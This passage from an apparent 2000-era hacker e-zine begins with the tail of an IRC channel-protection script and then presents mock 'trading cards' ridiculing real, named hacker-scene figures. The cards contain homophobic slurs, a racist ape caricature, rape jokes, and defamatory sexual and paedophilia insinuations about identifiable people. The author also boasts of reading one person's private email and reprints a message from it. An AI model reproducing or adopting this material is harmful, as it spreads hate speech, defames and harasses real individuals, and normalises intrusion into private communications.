@ cn = hook(CLI $0)
if ([$cn]!=[NONE]) {
@ cache[$cn][$struct($2)] = userhost()
^assign -cache[$cn][$struct($1)]
if ([$2]!=[$N]) {if (flood.check(NICK $userhost() $2 $0)) {
if (ischanop($N $0) && iscsetf(T $cn))
{if (match($2 \{ \} \\ $main.nix)) {quote KICK $0 $2 :^BLame nick detected!
^B}}
}}}
^assign -cn
}
on -raw_irc "% MODE % *" {
if (ischannel($2)) {
@ m.x = hook(CLI $2)
if ([$m.x]!=[NONE]) {
@ m.h = _userhost($0)
if (!m.h) {@ m.h = [SERVER]}
mode.main $left($index(! $0) $0) $m.h $2 $m.x $3-
^assign -m.h
}
^assign -m.x
}
}
alias mode.main {
@ m.i = 0
@ m.a = [$5-]
@ oper.test = ([$0]==[$N])
@ deop.test = 0
fec ($4) m.m {
if ([$m.m]==[+] || [$m.m]==[-]) {@ m.s = [$m.m]}{
if (index($m.m bklov) != -1) {
if ([$m.s$m.m]!=[-l]) {
^hook MODE$m.m$m.s $0 $1 $2 $3 $word($m.i $m.a)
@ m.i = m.i + 1
}
}{
if ([$1]!=[SERVER] && !oper.test) {@ flood.check(MODE $1 $0 $2)}
if (iscsetf(L $3)) {
@ m.z = hook(CUF $1)
if (index(E $userc[$m.z][C][$rmatch($2 $user[F][$m.z][C])]) == -1) {
if ([$m.s]==[+])
{if (index($m.m $chan[$4][L]) == -1) {@ mode.add($3 -$m.m)}}
{if (index($m.m $chan[$4][L]) != -1) {@ mode.add($3 +$m.m)}}
}
^assign -m.z
}
}
}
}
@ mode.flush($2)
quote.flush
}
on ^hook "MODEb- % % % % %" {
^assign -bans[$4][$struct($5)]
if (iscsetf(B $4) && !oper.test) {
if ([$_userhost($5)]!=[*@*]) {
@ banee = hook(CUS $_userhost($5))
if (index(B $userc[$banee][C][$rmatch($3 $user[S][$banee][C])]) != -1) {
@ operc = hook(CUF $2)
if (index(E $userc[$operc][C][$rmatch($3 $user[F][$operc][C])]) == -1)
{ @ mode.add($4 +b $5)
if (!isset(Q) && [$2]!=[SERVER]) {quote.add NOTICE $1 :Sorry ^B[^B$5^
B]^B is in my permanent banlist. $main.dem}
}
^assign -operc
}
^assign -banee
}
}
}
on ^hook "MODEb+ % % % % %" {
@ bans[$4][$struct($5)] = time()
if ([$2]!=[SERVER] && !oper.test) {
if (match($5 $N!$myuh)) {
@ mode.add($4 -b $5)
quote.add KICK $3 $1 :Dont ban ^B$5^B asshole! That's me!
echo *** ^BAlert^B: ^B$1^B banned you from $ch($3) with \"$5\"
if (ismset(U)) {away.save LiCe licelogd $1 banned you from $3 \($5\)}
}{
if (iscsetf(P $4)) {
@ banee = hook(CUF $2)
if (index(E $userc[$banee][C][$rmatch($3 $user[F][$banee][C])]) == -1)
{ @ baner = hook(CUF $_userhost($5))
if (baner) {
@ banee = rmatch($3 $user[F][$baner][C])
if (index(P $userc[$baner][C][$banee]) != -1) {@ mode.add($4 -b $5)
} if (index(R $userc[$baner][C][$banee]) != -1) {
if (ischanop($1 $3)) {@ mode.add($4 -o $1)}
@ mode.add($4 +b *!*$cluster($2))
if (!isset(Q)) {quote.add NOTICE $1 :Ban: $main.drm $5}
}
}{if (iscsetf(D $4)) {^timer -r 6 5 clean.sweep $3}}
^assign -baner
}{if (iscsetf(D $4)) {^timer -r 6 5 clean.sweep $3}}
^assign -banee
}{if (iscsetf(D $4)) {^timer -r 6 5 clean.sweep $3}}
}
}
}
^signoff ZAM
on ^hook "MODEo- % % % % %" {
if ([$2]!=[SERVER] && !oper.test) {
flood.check DEOP $2 $1 $3
if ([$1]!=[$5]) {if (iscsetf(P $4)) {
@ operc = hook(CUF $2)
if (index(E $userc[$operc][C][$rmatch($3 $user[F][$operc][C])]) == -1) {
@ operc = hook(CUF $cache[$4][$struct($5)])
if (operc) {@ opert = rmatch($3 $user[F][$operc][C])
if (index(P $userc[$operc][C][$opert]) != -1) {@ mode.add($4 +o $5)}
if (index(R $userc[$operc][C][$opert]) != -1) {
@ mode.add($4 -o $1)
if (!isset(Q)) {quote.add NOTICE $1 :Deop: $main.drm $5}
}}
^assign -opert
}
^assign -operc
}}}
}
on ^hook "MODEo+ % % % % %" {
if ([$5]==[$N]) {
if (iscsetf(D $4)) {^timer -r 6 5 clean.sweep $3}
}{
if ([$2]==[SERVER]) {
if (iscsetf(N $4)) {
@ operc = [$nsn[$hook(NSN $1)][$encode($3)][$encode($5)]]
if (!operc) {
if (iscsetf(P $4)) {
@ operc = hook(CUF $cache[$4][$struct($5)])
if (!operc) {@ mode.add($4 -o $5)}{
if (index(O $userc[$operc][C][$rmatch($3 $user[F][$operc][C])]) =
= -1) {
@ mode.add($4 -o $5)
}
}
}{@ mode.add($4 -o $5)}
}
^assign -operc
}
}{
if (!oper.test) {
if (iscsetf(B $4)) {
@ operc = hook(CUS $cache[$4][$struct($5)])
if (operc) {
if (index(D $userc[$operc][C][$rmatch($3 $user[S][$operc][C])]) !=
-1) {
@ deop.test = 1
@ mode.add($4 -o $5)
}
}
}
if (iscsetf(G $4) && !deop.test) {
@ operc = hook(CUF $2)
if (operc) {
if (index(E $userc[$operc][C][$rmatch($3 $user[F][$operc][C])]) ==
-1) {
@ operc = hook(CUF $cache[$4][$struct($5)])
if (index(O $userc[$operc][C][$rmatch($3 $user[F][$operc][C])]) =
= -1) {
@ mode.add($4 -o $5)
}
}
}{@ mode.add($4 -o $5)}
}
^assign -operc
}
^assign -deop.test
}
}
}
on ^hook "MODEk+ % % % % %" {
@ chan[$4][K] = [$5]
if (!oper.test) {
if (!iscsetf(K $4)) {
if ([$2]!=[SERVER]) {
if (iscsetf(M $4)) {
if ([$strip(\;$$^V^B^_^[^X^L $5)]!=[$5]) {
quote.add KICK $3 $1 :^BBogus key detected!^B
@ mode.add($4 -k $5)
}
}
}{
if (iscsetf(N $4)) {
@ mode.add($4 -k $5)
}
}
}
}
}
on ^hook "MODEk- *" {
^assign -chan[$4][K]
}
on ^mode * {
if (!isset(Z))
{if ([$1]==[$C])
{echo *** Mode change \"$2-\" on $ch($1) by ^B$0^B}
{echo *** Mode change \"$2-\" on $ch($1) by $0}}
}
on ^mode "% #% %bb *" {
if (!isset(Z))
{if ([$1]==[$C])
{echo *** Mode stack \($2\) on $ch($1) by ^B$0^B}
{echo *** Mode stack \($2\) on ^B$ch($1)\^B by $0}}
}
on ^mode "*.* #% *" {
if (!isset(Z))
{if ([$1]==[$C])
{echo *** Mode hack \"$2-\" on $ch($1) \(^B$0^B\)}
{echo *** Mode hack \"$2-\" on ^B$ch($1)\^B \($0\)}}
}
alias mode.add {
if (rindex(-+ $chan[$0][M0]) >= 4) {
quote MODE $hook(CLC $0) $chan[$0][M0] $chan[$0][M1]
^assign -chan[$0][M0]
^assign -chan[$0][M1]
}
@ chan[$0][M0] = [$chan[$0][M0]]##[$1]
@ chan[$0][M1] = [$chan[$0][M1]]##[$2- ]
}
alias mode.flush {
@ mf = hook(CLI $0)
if ([$chan[$mf][M0]]!=[]) {
if (ischanop($N $0)) {
quote MODE $0 $chan[$mf][M0] $chan[$mf][M1]
}
^assign -chan[$mf][M0]
^assign -chan[$mf][M1]
}
^assign -mf
}
alias quote.add {
@ qn = [$*]
if ((@temp.quote + @qn) >= 1000) {
quote.flush
if (@qn >= 1000) {quote $qn}{@ temp.quote = [$qn]##[$decode(AN)]}
}{
@ temp.quote = [$temp.quote]##[$decode(AN)]##[$qn]
}
^assign -qn
}
alias quote.flush {
if (temp.quote) {
quote $temp.quote
^assign -temp.quote
}
}
[END_CUT] h4g1s.irc
[END_DIR] l00pb4q
___________________________________
.-' `-.
[04]| l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz |[04]
[04]| by: |[04]
[04]| l4m4h t4m4h INC |[04]
`-.___________________________________.-'
t0 wh0m th1z w4r3z m4y c0nc3rn:
de4r re4der, eye 4m ple4z'd two inph0rm u th4t l4m4h t4m4h
incorp3r4t3d h4z begun a n3w pr0j3kt: l4m4h t4m4h H/P/V/C/A
tr4d1ng k4rdz. th3z c4rdz c0ns1st 0f all y0r ph4v0r1te h4kr
h3r0z@! curr3ntly w3 r try1ng t0 g3t th3m includ3d in b0x3z
of kr4kr j4kz and b1g ch3w bubbl3 gumz. th3r3 w1ll b m4ny
m0r3 k4rdz tw0 k0me. k33p y0r b4n4n4z pe4l3d and b 0n the
w4tch0ut f0r future rele4s3s 0f thez w0nderful k4rdz.
wh4t k4n eye d0 w1th l4m4h t4m4h h/p/v/c/a tr4d1ng k4rdz?!
w3ll, u c4n d0 alm0st anything. th3y r the ide4l party f4v0r
at k0nz lyke pumpcon, defc0n, and fagh4t c0n. u c4n pl4y
str4p h/p/v/c/a p0ker. u c4n pl4y tw1st3r us1ng h/p/v/c/a
tr4d1ng k4rdz. u c4n buy cert4in it3mz @ the doll4r gener4l
in compt0n with th3z k4rdz (k4rd st4mpz). y0u k4n tr4de 4
w4r3z w1th th3z w0nderful k4rdz on the eyeRC. y0u k4n l4mein4te
th3z k4rdz and be4t a wh1teh4t 0ver the he4d w1th them. l4m4h
t4m4h h/p/v/c/a tr4d1ng k4rdz M4KE THE PERF3CT BEVER4GE (J0LT)
CO4ST3RZ! the p0int iz, wh3r3ver l4m4h t4m4h hpvca tr4d1ng k4rdz
r, th3 p4rty iz there tw0.
h3r3 we w1ll include the f1rst s3t 0f l4m4h t4m4h h/p/v/c/a tr4d1ng
k4rdz. 0ur fe4tured elitez include:
* RLoxley
* route
* so1o
* emmanuel
* lore
* gov-boi
0k i kn0w ur sucreti4l gl4ndz r juzt 00z1ng ph0r the w4r3z s0 eldump
th1z mfqr. -- l4m4h t4m4h INC.
[BEGIN_DIR] lt
[CUT_HERE] Intro
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Handle: Intro(#1) | Affiliations: l4m4h t4m4h tr4d1ng k4rdz |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Contributions: THE FIRST EVER H/P/V/C/A TR4D1NG K4RDZ |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Special powerz: SPRE4D H0PE T0 CH1LDR3N W0RLDW1DE |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Famous line: "ILL DO EVERYTHING BUT I WONT NUKE FBI.GOV" <- |
|> meatloaf |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Charactoristics: SEE DESCR1PTION BEL0W |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| l4m4h t4m4h br1ngz u H/P/V/C/A TR4D1NG K4RDZ !@#!@#!# |
+ +
| th3z k4rdz w1ll c0nt4in all y0ur H/P/V/C/A her0z @# |
+ +
| th3z k4rdz w1ll b distr0'd in ph4s3s, f0r ex4mpl3 0ur f1rst |
+ ph4ze includez: RLoxley,route,so1o,emmanuel,lore,lusta, +
| gov-boi,Al Hugher,Solar Designer <- juzt t0 g3t shit k1qst4rtd|
+ +
| th4y w1ll f0ll0w a str1ct f0rmat. Y0U c4n uze th3z c4rdz |
+ any w4y u want suzh a$: H/P/V/C/A P0K3R, H/P/V/C/A MONOPOLY +
| & much much more@#! EVEN TR4D3 F0R W4R3Z WITH TH3M!@#! |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[END_CUT] Intro
[CUT_HERE] RLoxley
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Handle: RLoxley | Affiliationz: HackPhreak, Condemnation, gH |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Contributions: Various ETHICS paperz, #hackphreak@unet, 46G-CP|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Special powerz: Can bore u 2 death with lectures, Wuz a NAVY |
|> SEAL, haz many a cult followrz (#hp), h1z blUe bl0qrz emb0dy |
|> the infam0uz "R4Y 0F DE4TH", he rUnz pe4ce and pr0tecti0n!@ |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Famous line: "harassment = ban" |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Charactoristics: 6' 320lbs, long bushy h4ir, blUe bl0qrz, |
|> cl0wn noze, double ch1n, h0rnz, gut, hp tatoo on hiz fohead |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| h0rnz -> %%%%%%% <- bUzhy h4ir |
+ (hidden) %/%%%%%\% +
| : @\[o]^[o]/@ <- k-k00l spex (blue bl0qrz) |
+ : %%%| * |%%% <- cl0wn noze +
| .:. %%%%( o )%%%% <- bre4th 0f dEath |
+ : %%%%%% --- %%%%%% <- m0re buzhY h4ir +
| |
+ Soci4l n0te: h1z h0w4rd st3rn appe4rEnce e4rnz h1m br*wnY +
| p0intZ am0ngZt h1z pe4rZ |
+ +
| W4RNING: h1z blUe bl0qrz emb0dy the "R4Y 0F DE4TH" |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[END_CUT] RLoxley
[CUT_HERE] emmanuel
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Handle: Emmanuel (Oryan QUEST's father) | Affiliations: 2600 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Contributions: 2600 radio show (off the hook), Contributed |
|> many original philes to the LesserAgedPorn Society, gave |
|> Kevin Mitnick AIDS/ORAL HERPIES/SCABIES/IAS (ItchyAssSyndrom)|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Special powerz: He hunts in packs, he c4n wh1stle a 2600 tone |
|> into your e4r and fuk up y0ur equilibrium, he kn0wz the |
|> analyzr, he c4n unleash Oryan QUEST on u (Oryan QUEST is |
|> currently loqt in h1s f4thrz b4sem4nt itz fukt), he b3l0ngz |
|> to EHAP (so doez RLOLXLEY) (WHAT THE FUCK), he k4n h1de |
|> ch1ldr3n in h1s f4t when th4 FBI arr1v3Z, h3 p0s3ses the |
|> n4sty c0q 0f De4TH - one enc0unter w1th any fluidz and u will|
|> d1e isnt4ntly fr0m eveRY sTD kn0wn to m4nk1nd & pl4n3t e4rth |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Famous line: -> |
|> <emmanuel> teehee :D furlong: you awake? |
|> furlong (zeus@alamo.satexas.com) (Internic Commercial) |
|> ircname : I'm gay, really, I am |
|> channels : @#gaycams @#gayteenpics @#gayteenboys |
|> @#gaynetmeeting @#guycams @#gayteennetmeeting @#gaydads4sons |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Charactoristics: h3z beyond the sk0pe of thez tr4d1ng k4rdz |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TAKEN FROM A NASA SPACE HUBBLE TELESCOPE (only pic on record) |
+ +
| #%%# /^\ <- Destroyed 6 NYC bl0kz |
+ ##%### || \ +
| ##( )##=======#==%%==#=|| O ~. |
+ ####( )% || / . +
| #%##%%# ||/ . ' |
+ . +
| __`\./___ |
+ +
| He g0t t00 excited aT the LesserAgedPorn Society CON 1999 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[END_CUT] emmanuel
[CUT_HERE] gov-boi
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Handle: gov-boi | Affiliations: gH, hack.co.za, #DARKNET |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Contributions: gov-boi h4z brought t0 uz the b3st exploitz on |
|> the pl4n3t - his s1te hack.co.za speci4l1zez in expl0itz that|
|> *if* the expl0itable prog0r4m *wuz* setuid root - WE'd GET |
|> r00t sh3llz!@#!@ s0 b4sic4lly we r h0peing f0r adm1nz too |
|> recursivly chm0d everyth1ng setuid root#@! TH1S W1LL B TH3 |
|> D4Y FOR THE H4CK3R!@#!@ "/bin/ls" exploit by loophole [gH], |
|> h3 h4z br0ught t0 uz the w0nd3rz 0f #DARKNET on efnet - ipph |
|> u r int0 wAAAAAArEEz tr4de th1s is the pl4ce 4u (so1o !@)!, |
|> and f1n4lly - wh4t w0uld we d0 with0ut all h1z gH expl0it/ |
|> msc4n fr0nt3ndz - WERD GOV-BOI TH4NKZ (o shyt i juzt f0und |
|> /bin/cat suid root WaREZ waREZZZZZZ waREZZZZZZZZZZZZZZZZZ) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Special powerz: d0nkey k0ng p1n att4k - he inc0rper8z a d0nky |
|> k0ng f1st sl4m w1th a double dr4g0n p1n att4ck t0 destr0y h1z|
|> v1ct1mz, sup3r y3ll0w s0dim1zr - h3 s0d1m1z3s y0u w1th |
|> _fr3sh_ b4nn4n4 (n0 r0tt0n b4nn4nz), HE CAN RM YUOR BOX AT |
|> ANY MOMENT (albeit, only pr0gz normally not suidr00t must be |
|> ch4nged to suidr00t, sory already suidr00t progr4mz r not |
|> vuln3rable),h3 - lyke RLoxley - h4z many followerz "You may |
|> stop one of us but you cant stop us all" werd |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Famous line: eye d0nt even kn0w th1s f4gg0t s0 eye'll m4k3 1up|
|> "Heh, mixter is elite." |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Charactoristics: h3 l00kz just lyke an APE - i g0t n0thing |
|> against zaire d@@dz but th1s one t4k3z the c4k3, "WaReZ" |
|> tatoo'd to h1s forhe4d, l@@kz just lyke his m0ther |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| n@t1ce h1z ZAIRE appear3nce (t4k3n s0mewh3r3 in th3 c0ng0): |
+ .-"""-. +
| / WaReZ \ <- ap3 lyke f0rhe4d |
+ (_|o o/ |_ <- ap3 lyke eyez +
| / " \ ,_) <- ap3 lyke e4rz |
+ \ O /__/ <- ap3 lyke m0uth (hez stalking h1z prey, +
| ;--' (then h3 w1ll pe4l the phuq out of it) |
+ <- n@tice the dr3wl dr1ppn from hiz ch1n +
| |
+ n@te: h3 1z dr@@l'n bec0z their r b4nn4n4z full o WAReZZZZZ +
| nearby |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[END_CUT] gov-boi
[CUT_HERE] lore
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Handle(s): lore,l-n1nja,fiddler | Affiliations: (cheq this |
|> du0dz affiliationz out h4h4h4h4h4!) gH, TeamSploit, f0rpaxe |
|> TREATY (ROFLMAOLoL ahha), #fubuhacking @ undernet (b4h4h4h4),|
|> Team HackPhreak (aaaaaahahahahahah), XYZ (wh0a, s0me s0urcez |
|> t3ll uz l0re iz 1n XYZ g0od g0ing br0 now ur 3v3n 1000000000 |
|> timez m0re LAyME), #hacktech (l4m3rz), 0h yeh btw TREATY |
|> st4ndz f0r lyke TEDDI RUXPIN ENTHUSIASTS what a f4gg0t, |
|> packetstorm security, insomnia communications |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Contributions: h3z an av1d p0ast3r 0f DoS att4kz f0r |
|> pack3tst0rm security, h3z g0t t0nz 0f defacementz on |
|> attrition.org k0z hez 0ne 0f the b3st defacerz there iz, h3 |
|> add3d elite k0l0urz to smurf s0urcez, he c0ntrib'd linux |
|> 2.0.36 k3rn3l s0urcE t0 ftp.uu.net/tmp f0r all the k1d1ez to |
|> have, h3 h4z als0 contributed much t00 the h4ckphre4k k4use |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Special powerz: h3z g0t a bcast list 0ut 0f th1s w0rld i sw4re|
|> p1ss h1m 0ff and ur fuqn m0d3m iz powd3r3d to4st, he w0rx 4 |
|> xyz s0 hez g0t all the l4t3st 0day (n@t3 t0 s3lf, dont run |
|> netsc4pe he w1ll cr4sh it @!#!@#!@), hez g0t 2 BB gunz (co2 |
|> p0wered i m1ght ADD) m0unt3d t0 h1z tricycle for wh3n he g0ez|
|> r0und hall'n *buq buq buq*, 1f u r f3m4l3 bew4r3 0f th1s |
|> l4m3A$$ m0thrfukr h3'll pr0b4bly trY and r4pe u |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Famous line: -> |
| <lore-> l4m4ht4m4h |
| <lore-> i had checkpoint mailing me |
| <l4m4ht4m4h> oh really? |
| <l4m4ht4m4h> what they say ? |
| <lore-> when was the last time a high profile company msiled |
|> you |
| <l4m4ht4m4h> hahaha |
| |
| i (l4m4ht4m4h) f0und th1s v3ry funny bec0z i h4v3 ax$ |
| t0 h1z XYZ m4il s0 l3tz se4 wh4t h3z t4lk1n ab0ut: |
| |
|Message: 22 of 34 |
|Folder: INBOX |
|From: "Scott Walker Register" scott.register@us.checkpoint.com |
|to Address Book Filter Sender |
|Date: Thu, 6 Jul 2000 15:46:46 -0500 |
|Subject: FW-1 DOS attack inquiry |
|Header: Displaying BriefHeader Show Full Header |
|[line.gif] |
|Gentlemen- |
|After extensive testing with the source code you provided, we |
|>have |
|been unable to reproduce any system problems with any version |
|>or |
|platform. Could you please provide more details, such as the |
|>exact |
|version and platform where you were able to produce a system |
|>crash? |
|Thanks, |
|-SwR |
| |
| wh04 l0re n3v3r em4il3d h1m b4q, i gueSS h3z keepn it -1d4yz |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Charactoristics: 6'5 180 ALL MUSCLE, a cross dug into his |
|> chEEq, bcast l1st bandana - for when hez claimin, so1o'z |
|> emirgibeeprteledce - getz ahold of hiz boy so1o quik as hell,|
|> h3z pitch white kinda lyke gh0st |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| |
+ ^^^^^^^^^ <- cheq 0ut h1z buzzkut +
| *( O o )* <- n@te: if u r evr cr4qn on h1m, he 1z |
+ | ? .:.| he4ring imp4ired +
| \ [] : / |
+ `-----' <- h3z in awe, h3 just n0ticed +
| n@t1ce how ugly he iz netscan.org 1n hiz win2k b0x'z monitr |
+ hez th1nkn "i w1sh i c0uld smurf l4m4h+
| t4m4h" <- h4h4 |
+ +
| f4r 0ff in the b4qr0und eye'M ch3qn h1z XYZm4il 4 WaRRRRRez |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[END_CUT] lore
[CUT_HERE] route
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Handle: route | Affiliationz: Phrack, The Guild, TiC, LIBNET |
|> Packetfactory, r00t, r00tparty, layer8 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Contributions: Phrack editor, Libnet, TheInfinityConcept |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Special powerz: Wrote many a DoS att4k, will kiqban you from |
|> #phrack, uzez b1g fuqn w0rdz in h1z paperz/c0dez, gave m1tniq|
|> Libnet v0.1 pri0r to hiz arrest (fe4r), C4N STE4L YOUR HONEY |
|> (honey meanz chiq) BY FLASHING THEM W1TH HIZ BIN4RY CIRCUITRY|
|> TATOO @! JUZT 0NE GL4NCE AND Y0URE 1N H1Z P4NTZ (hiz motto) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Famous line: "* route is away [coding]" |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Charactoristics: Depends on the CON, sliqt up h4irWaReZ, b1g |
|> @ss forhe4d, r4y b4nz spex, g0 tee fu m4n chu, oily sk1n, |
|> bin4ry circuitrY t4t00, LIBNET tatto on hiz genitalia, bu1lt |
|> lyke pee wee h4r man on the ho4rze, rusty coq ring (he forgot|
|> Nirva gave it too him) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| |
+ _\.//|/.\._ <- h4ir dun sliqt up +
| > < |
+ @\<O>-<O>/@ <- r4y banz, eyez r open w1de becoz he se4z +
| | ^ | b1g pl4nz - b1g future w1th Libnet(TM) by|
+ \ <_> / h1z s1de +
| --,,,-- <- g0 tee fu man chU |
+ +
| N@te t@ self: route loox lyke a fucking f@ggot |
+ +
| N@te: p1c taken aft3r he finished the Libnet lUzrz RefMan |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[END_CUT] route
[CUT_HERE] so1o
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Handle: so1o,so7o,t,es | Affiliations: Code ZeRo, m1lw0rm, |
|> ashtray, ns2.co.uk, coderz.org 0r s0me shYt |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Contributions: Code ZeRo, Defaced many a webp4ge, mscan'd many|
|> a netw0rk, wuz the b1ggezt k0urieR in h4kr h1story, k0uri3r'd|
|> many a k0de, wuz in m4ny ezinez (2 b m4de fun of: BoW, b4b0, |
|> the l1st g0ez on), so1o.irc (automated k0de begging scr1pt), |
|> dr0pt RLoxleyz inph()'z |
